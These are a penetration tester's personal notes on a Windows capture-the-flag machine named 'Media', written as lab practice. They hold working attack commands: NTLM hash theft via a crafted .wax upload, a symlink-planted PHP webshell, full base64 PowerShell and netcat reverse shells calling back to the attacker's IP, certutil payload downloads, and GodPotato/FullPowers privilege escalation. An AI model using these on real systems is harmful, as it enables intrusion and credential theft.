# Lessons Learned
- **When we see a `"we will get back to you shortly"` message associated with a file upload mechanism, assume that the uploaded file will be opened**
- **Writable dir can be symlinked to a non-writable dir**
- Then a file placed in the writable dir will be dumped into the non-writable one
- `icacls` is great for checking perms in Windows
- `nt authority\service account` should have `SeImpersonatePrivilege` by default
- See [https://learn.microsoft.com/en-us/windows/win32/services/localservice-account](https://learn.microsoft.com/en-us/windows/win32/services/localservice-account)
- `FullPowers.exe` can be used to restore the full set of default privs for `nt authority\service account`
- https://github.com/itm4n/FullPowers
- `EnableAllTokenPrivs.ps1` can be used to enable all currently disabled privs
- https://github.com/fashionproof/EnableAllTokenPrivs
- https://medium.com/@markmotig/enable-all-token-privileges-a7d21b1a4a77
- We can feed a powershell revshell to a simple cmd type php webshell
- The revshell maybe need to be base64 encoded and then the `powershell -e base64_blob` portion may need to be URL encoded
- We could have also used webshell to upload an `msfvenom` payload, then used webshell to execute the payload to provide a revshell or meterpreter shell (depending on `msfvenom` payload)
- `SeTcbPrivilege` is very much abusable
- Next time, use: [CharminDoge/tcb-lpe: SeTcbPrivilege Local Privilege Escalation Exploit](https://github.com/CharminDoge/tcb-lpe)
---
# After-Action Attack Sequence
- File upload functionality wrt the Apache webserver
- Upload an Windows Media Player compatible test file
- Notice that someone will get back to use shortly; presume based on this that the file will be clicked on
- Use `ntlm_theft.py` to generate a `.wax` file and upload
- Listen for an NTLMv2 hash using `sudo resp -I tun0`
- Crack NTLMv2 hash with `hashcat -m 5600`
- Connect to the box with SSH as `enox`
- Look over `review.ps1` available in `\users\enox\documents`
- Review `httpd.conf` in `\xampp\apache\config`
- Review `index.php` in `\xampp\htdocs`
- Here we notice the files are being uploaded to `\windows\tasks\uploads` in a folder that is the md5 hash of the supplied `first_name.last_name.email` > `[
[email protected]](mailto:
[email protected])` = 44b85c98e94039c8a0a015f6d3a3449e
- `enox` has RW access to `\windows\tasks` but not `\xampp\htdocs`
- Clear out existing dir: `44b85c98e94039c8a0a015f6d3a3449e` in `\windows\tasks\uploads`
- Create a symlink from `\windows\tasks\uploads\44b85c98e94039c8a0a015f6d3a3449e` to `\xampp\htdocs`
- Upload a simple GET or REQUEST PHP webshell > `shell.php`
- Confirm that our symlink caused the webshell to be dropped into `\xampp\htdocs`
- Test webshell with `curl [http://meda.htb/shell.php?cmd=whoami`](http://meda.htb/shell.php?cmd=whoami)
- Here we see that the webserver is running as `nt authority\local service`
- According to [https://learn.microsoft.com/en-us/windows/win32/services/localservice-account](https://learn.microsoft.com/en-us/windows/win32/services/localservice-account), this account should have `SeImpersonatePrivilege`
- Connect to the box as `nt authority\local service`
- Feed the webshell a URL encoded command with a powershell revshell encoded as a base64 blob
- Grab base64 powershell revshell from [revshells.com](http://revshells.com/)
- Use following command: ` curl [http://media.htb/shell2.php?cmd=](http://media.htb/shell2.php?cmd=)"powershell%20-e%20[based64_blob]"`
- From here, use `FullPowers.exe` to activate `SeImpersonatePrivilege` for `nt authority\local service`
- We could also abuse `SeTcbPrivilege`
- Connect to the box as `nt authority\system`
- Use `GodPotato-NET4.exe` to open a revshell as `nt authority\system`
---
# Discover Ports & Services
- `ping` test ![[images/Pasted image 20260401144758.png]]
- windows based on TTL
- `nmap` scan - light ![[images/Pasted image 20260401144904.png]]
- `nmap` scan - detailed ![[images/Pasted image 20260401145416.png]]
- `nmap` scan - UDP ![[images/Pasted image 20260401145804.png]]
---
# Service Enum
## Port 80 (HTTP): Apache 2.4.56; PHP 8.1.17
### Initial review
- Visit page ![[images/Pasted image 20260401145035.png]]
- Not much to see here
- view source ![[images/Pasted image 20260401151031.png]]
- request:response in `burp` ![[images/Pasted image 20260401151149.png]]
- Few names ![[images/Pasted image 20260401145214.png]]
- File upload button may work? > asks for a video file (compatible with Windows Media Player) ![[images/Pasted image 20260401145200.png]]
### Web fuzzing
- Try `feroxbuster`
- `feroxbuster` uses `raft-medium` by default but this can be changed
- this is a lot of output
```bash
feroxbuster -u http://10.129.13.168
```
![[images/Pasted image 20260401150050.png]]
- Directory fuzzing
- `raft-medium` ![[images/Pasted image 20260401150339.png]]
- `assets` shows the explorer for all images > nothing useful ![[images/Pasted image 20260401150713.png]]
- `2.3-medium` > nothing new ![[images/Pasted image 20260401150920.png]]
- Subdomain fuzzing
- `top1million-20000` > nothing ![[images/Pasted image 20260401151513.png]]
- VHost fuzzing
- `top1million-20000`
### Other Checks
- Try `index.html` > default 404
- Try `index.php` > drops us to home page
- Try random page > default 404 ![[images/Pasted image 20260401150529.png]]
- No `robots.txt` and no `sitemap.xml`
- `whatweb` scan ![[images/Pasted image 20260401151410.png]]
- `searchsploit` for apache and php version
- nothing for `apache` 2.4.56
- php 8.1.17 may have an exploit? ![[images/Pasted image 20260401151856.png]]
### PHP 8.1.17
- Review `php/webapps/52047.py`
- Associated with `CVE-2024-4577` ![[images/Pasted image 20260401152205.png]]
- Takes URL and command arguments
- Getting errors ![[images/Pasted image 20260401153057.png]]
- Try different command > returns the home page
```bash
python3 52047.py http://10.129.13.168 dir
```
![[images/Pasted image 20260401153839.png]]
- Try https://github.com/watchtowrlabs/CVE-2024-4577
- Getting errors regarding the command
```bash
python exploit.py --target http://10.129.13.168/index.php -c "<?php system('calc');?>"
```
---
# File Upload Attack
## Attempt 1: Generate Custom AVI File with PHP Echo Test
- Create a AVI file with the proper magic bytes that includes `<?php echo "Hello";?>` as a test
- Use an online converter to convert hex `52 49 46 46 ?? ?? ?? ?? 41 56 49 20` to ASCII
- View with `xxd` and check with `file` ![[images/Pasted image 20260401194957.png]]
- Attempt to upload > recognized as an `.avi` ![[images/Pasted image 20260401195124.png]]
- Looks like it was successful ![[images/Pasted image 20260401195155.png]]
- view request:response in `burp` ![[images/Pasted image 20260401195616.png]]
- Where was it uploaded?
- Try again with `cmd` ![[images/Pasted image 20260401195818.png]]
- Upload successful > try appending `?cmd=id` to root dir > nothing ![[images/Pasted image 20260401195956.png]]
## Attempt 2: Generate Custom WAX File with `ntlm_theft.py`
- The alert indicated that someone will review and get back to us
- We can presume that it will be opened on the webserver
- Because we are targeting a Windows box maybe we can leak an NTLM hash
- Use `ntlm_theft.py` from [Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)](https://github.com/Greenwolf/ntlm_theft)
- Let's look at the options ![[images/Pasted image 20260401201510.png]]
- There are only so many extension options: Which are compatible with Windows Media Player?
- Looks like asx, wax, or m3u may work based on some googling as they are AV type files
- Let's try `.wax` ![[images/Pasted image 20260401202533.png]]
- Run `sudo responder -I tun0` and upload the `.wax`
- Upload successful ![[images/Pasted image 20260401202635.png]]
- And, we got an NTLM hash for `enox` ![[images/Pasted image 20260401202704.png]]
- Looks like an NTLMv2 based on `hashid` ![[images/Pasted image 20260401202758.png]]
- Attempt to crack with `hashcat -m 5600`
- We have creds for `enox` ![[images/Pasted image 20260401203012.png]]
---
# Foothold as `enox`
## Connect with RDP
- Confirm creds with `nxc rdp` because port 3389 was open ![[images/Pasted image 20260401203413.png]]
- This seems like it might be an old windows box
- Having issues getting connecting with both `xfreerdp3` and `rdesktop` ![[images/Pasted image 20260401204802.png]] ![[images/Pasted image 20260401204742.png]]
- Looks like it wants a Kerberos TGT. This is odd because we saw no signs of a DC like ports 88, 389, 636, 5985, etc. being open
## Connect with SSH
- Also try creds with `nxc ssh` because port 22 was open ![[images/Pasted image 20260401204627.png]]
- Let's SSH into the box with our creds for `enox`
- We are in > not much to work with in terms of groups and privs ![[images/Pasted image 20260401205206.png]]
- Browse docs accessible to `enox`
- There is a script in `\users\enoc\documennts` entitled `review.ps1` ![[images/Pasted image 20260401211733.png]]
- Since we know there was a webserver let's look at Apache's `httpd.conf` and PHP files
- Navigate to `\xampp` ![[images/Pasted image 20260401210047.png]]
- Navigate to `\xampp\apache\config` and `type httpd.conf`
- Navigate to `\xampp\htdocs` to view PHP files
- Type `index.php` ![[images/Pasted image 20260401210329.png]]
- Upload dir = `\windows\tasks\uploads` where the folder name is an md5 hash of `first_name.last_name.email`
- A bit odd that the upload loc is not in `\xampp\htdocs` or elsewhere in `\xampp`
- Also this `todo.txt` may be linked to the script we found earlier
- Move `WINPEAS.EXE` to box with `scp`
```bash
scp /opt/winPEASx64.exe
[email protected]:/users/enox/desktop/winpeas.exe
```
![[images/Pasted image 20260401211354.png]]
- Let's save output to a file and exfil for review on Kali
```powershell
winpeas.exe > results.txt
scp
[email protected]:/users/enox/desktop/results.txt ~/Documents/htb/boxes/media/results.txt
```
- Oddest thing that jumped out at me ![[images/Pasted image 20260401213223.png]]
### Simple webshell by symlinking `\windows\tasks\uploads` to `\xampp\htdocs`
- Confirm access to `\windows\tasks\uploads`
```powershell
icacls "c:\windows\tasks\uploads"
Get-Acl -path "c:\windows\tasks\uploads" | Format-Table -Wrap
```
![[images/Pasted image 20260402182421.png]]
- Clear out the md5 folder for `
[email protected]`
- Note the md5 hash: `44b85c98e94039c8a0a015f6d3a3449e` ![[images/Pasted image 20260402183645.png]]
- Make a symlink to `\xampp\htdocs` and confirm
```powershell
cmd /c mklink /J C:\Windows\Tasks\Uploads\44b85c98e94039c8a0a015f6d3a3449e C:\xampp\htdocs
ls .\Windows\Tasks\Uploads\44b85c98e94039c8a0a015f6d3a3449e\
```
![[images/Pasted image 20260402183819.png]] ![[images/Pasted image 20260402183826.png]]
- Now when we upload a simple php webshell as `shell2.php` it will be placed in `htdocs` and accessible from `\shell2.php?cmd=whoami`
- Upload `shell2.php` ![[images/Pasted image 20260402184116.png]]
- Check `\xampp\htdocs` ![[images/Pasted image 20260402184127.png]]
- Now hit webshell
- Works! ![[images/Pasted image 20260402184439.png]]
- Let's use `curl` instead and URL encode `whoami /all` with `cyberchef.org` ![[images/Pasted image 20260402184526.png]]
- As we see above, `nt authority\local service` has the `SeTcbPrivilege` privilege but it's disabled
---
# Revshell for access as `nt authority\local service`
## Attempt 1: Discrete `revshelll.php`
- Let's upload a php revshell ![[images/Pasted image 20260402193954.png]]
- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
- That uploaded to `htdocs` but did not hit the listener
## Attempt 2: Feed the original webshell a base64 encoded powershell command
- Let's get a revshell by providing a base64 encoded powershell command as data to our webshell
- Use `revshells.com` to generate the base54 blob
```bash
curl http://media.htb/shell2.php --data-urlencode 'cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'
```
- I'm getting a deprecation related error ![[images/Pasted image 20260402195855.png]]
## Attempt 3: Feed the original webshell a base64 encoded powershell command with URL encoding
- Let's URL encode the portion associated with `"powershell -e [base64_blob]"` and retry with the below
```bash
curl http://media.htb/shell2.php?cmd="powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
```
- That worked! ![[images/Pasted image 20260402201144.png]]
---
# Privesc
- Let's find a way to enable `SeTcbprivilege` and abuse to privesc
## Attempt 1: `seTcb.exe`
- https://github.com/mSameerMalik/SeTcbPrivilege_escalation/ ![[images/Pasted image 20260402201415.png]]
- This tool also automatically enables the priv
- First, move `seTcb.exe` to target
- Note `service account` does not have access to `\windows\temp` or `users\public` but does have access to `\xampp`
```bash
mkdir www && cd www
wget https://github.com/mSameerMalik/SeTcbPrivilege_escalation/blob/main/seTcb.exe
python3 -m http.server
```
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/seTcb.exe \xampp\htdocs\setcb.exe
```
- Second, add `enox` to administrators group
- Fails to add `enox` to administrators
- Maybe we need to try a specify a service other than `group`
```powershell
.\setcb.exe group "cmd /c net localgroup administrators enox /add"
```
## Attempt 2: `TcbElevation-x64.exe`
- https://github.com/b4lisong/SeTcbPrivilege-Abuse
- looks like we need to enable the priv
- First, enable `SeTcbPrivilege` with [fashionproof/EnableAllTokenPrivs](https://github.com/fashionproof/EnableAllTokenPrivs/tree/master)
- Move to target and run > Enabled!
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/enablealltokenprivs.ps1 \xampp\htdocs\enableall.ps1
```
![[images/Pasted image 20260402204121.png]]
- Second, download `TcbElevation-x64.exe` and `nc64.exe`, then move to target
![[images/Pasted image 20260402204455.png]]
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/nc64.exe \xampp\htdocs\nc64.exe
certutil.exe -urlcache -split -f http://10.10.14.197:8000/TcbElevation-x64.exe \xampp\htdocs\TcbElevation-x64.exe
```
- Third, setup a listener on Kali and run the tool on the target as below
```powershell
.\TcbElevation-x64.exe run54 "C:\Windows\system32\cmd.exe /c C:\xampp\htdocs\nc64.exe -e cmd 10.10.14.197 4445"
```
- Nothing on listener ![[images/Pasted image 20260402205448.png]]
## Attempt 3: Run `FullPowers.exe` for `SeImpersonatePrivilege`, then run `GodPotato.exe`
- Download `fullpower.exe` and `GodPotato` on Kali ![[images/Pasted image 20260402211342.png]]
- to check `.NET` version use below command
```cmd
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s
```
- Move to target with `certutil`
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/FullPowers.exe \xampp\htdocs\FullPowers.exe
certutil.exe -urlcache -split -f http://10.10.14.197:8000/GodPotato-NET4.exe \xampp\htdocs\GodPotato-NET4.exe
```
![[images/Pasted image 20260402211449.png]]
- Run `fullpowers.exe` to create a revshell
```powershell
.\FullPowers.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
```
- Now we have full powers ![[images/Pasted image 20260402211902.png]]
- Run `GodPotato` for yet another revshell as below
```powershell
.\GodPotato-NET4.exe -cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
```
- There we go! ![[images/Pasted image 20260402213020.png]]